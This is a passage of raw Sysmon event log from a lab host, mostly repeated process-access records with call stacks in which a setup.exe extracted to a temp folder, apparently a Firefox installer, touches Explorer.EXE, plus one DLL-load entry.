\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-stdio-l1-1-0.dll2021-01-18 13:59:52.224 10341000x800000000000000014522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 